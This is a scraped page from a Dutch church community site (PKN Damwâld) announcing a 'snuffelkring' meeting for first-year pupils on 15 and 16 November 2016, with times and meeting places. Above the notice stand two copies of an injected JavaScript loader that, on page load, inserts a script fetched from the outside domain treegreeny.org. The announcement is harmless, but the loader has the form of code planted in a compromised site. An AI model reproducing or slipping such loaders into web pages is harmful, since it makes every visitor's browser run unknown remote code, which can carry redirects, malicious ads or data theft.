;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Snuffelkring - PKN Damwâld
15 november t/m 16 november 2016
Damwâld
SnuffelkringVoor alle brugklassers !

Volgende week dinsdag en woensdag worden de brugklassers weer verwacht voor de snuffelkring. Dinsdag om 16.30 uur bij ds. Boukes thuis of in ‘t Skûlplak en woensdag om 16.30 uur bij ds. Boukes thuis.

Locatie: DamwâldDamwâld